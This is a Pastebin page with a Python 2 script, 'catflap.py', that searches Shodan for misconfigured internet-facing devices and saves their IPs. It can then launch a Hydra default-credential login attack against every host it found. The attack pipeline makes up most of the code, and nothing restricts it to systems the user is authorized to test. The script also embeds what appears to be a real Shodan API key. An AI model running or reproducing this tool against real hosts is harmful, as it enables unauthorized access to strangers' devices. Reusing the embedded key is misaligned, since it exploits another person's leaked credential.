API tools faq
paste
Advertisement
leonteale

catflap.py

leonteale
Dec 26th, 2013
3,019
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 5.68 KB | None | 0 0
raw download clone embed print report
  1. #! /usr/bin/env python
  2. #####################################
  3. #        Catflap.py by @leonteale   #
  4. #            Version 2.0            #
  5. #          Default Pass login       #
  6. #     Requirements: shodan, Hydra   #
  7. #####################################
  8. # Requirements:
  9. # easy_install shodan
  10. # apt-get install hydra
  11.  
  12. import sys
  13. import os
  14. import argparse
  15. from subprocess import call
  16. from shodan import WebAPI
  17.  
  18. SHODAN_API_KEY = "YaLNvFBVpaTrMkW829nATM3xRTvMaVsH"
  19. # Get your API Key Here: "http://www.shodanhq.com/api_doc"
  20.  
  21. api = WebAPI(SHODAN_API_KEY)
  22.  
  23.  
  24. # Prints title, version, contact info, etc.
  25. def banner():
  26.     title = "Catflap.py"
  27.     version = "Version 2.0"
  28.     contact = "leonteale89@gmail.com"
  29.     print "-" * 45
  30.     print title.center(45)
  31.     print version.center(45)
  32.     print contact.center(45)
  33.     print "-" * 45
  34.  
  35. #Parse Arguments
  36. parser = argparse.ArgumentParser(description="Using Shodan to search for mis-configured devices - (output file saved to output.txt)")
  37. group = parser.add_mutually_exclusive_group()
  38. group.add_argument("-v", "--verbose", action="store_true")
  39. group.add_argument("-a", "--advanced", action="store_true", help="Show all result data")
  40. group.add_argument("-i", "--ip", action="store_true", help="Show IPs result only")
  41. parser.add_argument("search", help="Search keyword(s)")
  42. group.add_argument("-s", "--simple", action="store_true", help="simple search")
  43. group.add_argument("-r", "--hydra", action="store_true", help="Launches Hydra attack against first page of results")
  44. args = parser.parse_args()
  45.  
  46. #Usage
  47. def usage():
  48.     print "You must supply an argument with your search\n"
  49.     print "usage: Catflap.py [-h] [-v] [-a | -s] search\n"
  50.     print "Example: Catflap.py \"default logins\" --simple\n"
  51.  
  52. def hydra():
  53.     os.system("cp -a output.txt something.txt")
  54.     os.system("hydra -C creds.txt -M something.txt http-get / > hydra.tmp")
  55.     os.system("cat hydra.tmp | sort | grep host")
  56.  
  57. #Actual script
  58. def core():
  59.    
  60.     ## Advanced Results
  61.     if args.advanced:
  62.         outputfile = open("output.txt", "wb")
  63.         # Search Shodan
  64.         results = api.search(sys.argv[1])
  65.  
  66.         # Show the results
  67.         print "Results found for '%s': %s" % (sys.argv[1], results['total'])
  68.         print ""
  69.         for result in results['matches']:
  70.             outputfile.write(result['ip'])
  71.             outputfile.write("\n")
  72.             outputfile.write(result['data'])
  73.             outputfile.write("\n")
  74.             print result['ip']
  75.             print result['data']
  76.         print '\nResults found: %s' % results['total']
  77.  
  78.     ## Verbose Output
  79.     if args.verbose:
  80.         outputfile = open("output.txt", "wb")
  81.         # Search Shodan
  82.         results = api.search(sys.argv[1])
  83.  
  84.         # Show the results
  85.         print "Results found for '%s': %s" % (sys.argv[1], results['total'])
  86.         print ""
  87.         for result in results['matches']:
  88.             outputfile.write(result['ip'])
  89.             outputfile.write("\n")
  90.             outputfile.write(result['data'])
  91.             outputfile.write("\n")
  92.             print 'IP: %s\n' % result['ip']
  93.             print 'Data: %s\n' % result['data']
  94.  
  95.         print '\nResults found: %s' % results['total']
  96.  
  97.     ## Simple output
  98.     if args.simple:
  99.             outputfile = open("output.txt", "wb")
  100.             # Search Shodan
  101.             results = api.search(sys.argv[1])
  102.  
  103.             # Show the results
  104.             print "Results found for '%s': %s" % (sys.argv[1], results['total'])
  105.             print ""
  106.             for result in results['matches']:
  107.                 if "Basic realm" in result['data']:
  108.                     outputfile.write(result['ip'])
  109.                     outputfile.write("\n")
  110.                     outputfile.write(result['data'])
  111.                     outputfile.write("\n")
  112.                     print result['ip']
  113.                     print result['data']
  114.                 else:
  115.                     continue
  116.             print '\nResults found: %s' % results['total']
  117.  
  118.     ## Return IPs only
  119.     if args.ip:
  120.        
  121.         outputfile = open("output.txt", "wb")
  122.        
  123.         # Search Shodan
  124.         results = api.search(sys.argv[1])
  125.  
  126.         # Show the results
  127.         print "Results found for '%s': %s" % (sys.argv[1], results['total'])
  128.         print ""
  129.         for result in results['matches']:
  130.             outputfile.write(result['ip'])
  131.             outputfile.write("\n")
  132.             print result['ip']
  133.         print '\nResults found: %s \n' % results['total']
  134.        
  135.         ## Ask to run hydra attack against output.txt
  136.         #confirm()
  137.     ## Runs hydra attack against output.txt
  138.     if args.hydra:
  139.         hydra()
  140.  
  141.  
  142. #confirmation block
  143. def confirm(prompt=None, resp=False):
  144.     outputfile = open("output.txt", "wb")
  145.  
  146.     if prompt is None:
  147.         prompt = 'Would you like to test these hosts with Hydra?'
  148.  
  149.     if resp:
  150.         prompt = '%s %s|%s: ' % (prompt, 'Y', 'n')
  151.     else:
  152.         prompt = '%s %s|%s: ' % (prompt, 'N', 'y')
  153.        
  154.     while True:
  155.         ans = raw_input(prompt)
  156.         if not ans:
  157.             print "you answered no"
  158.             return resp
  159.         if ans not in ['y', 'Y', 'n', 'N']:
  160.             print 'please enter y or n.'
  161.             continue
  162.         if ans == 'y' or ans == 'Y':
  163.             hydra()
  164.             return True
  165.         if ans == 'n' or ans == 'N':
  166.             return False
  167.  
  168. def cleanup():
  169.     os.system("rm hydra.tmp")
  170.     os.system("rm something.txt")
  171.  
  172.  
  173. #Ye old main
  174. def main():
  175.     banner()
  176.     core()
  177.     cleanup()
  178.  
  179. # Force usage
  180. if __name__ == '__main__':
  181.     if len(sys.argv) > 3 or len(sys.argv) < 3:
  182.         banner()
  183.         usage()
  184.         sys.exit(1)
  185.     else:
  186.         main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!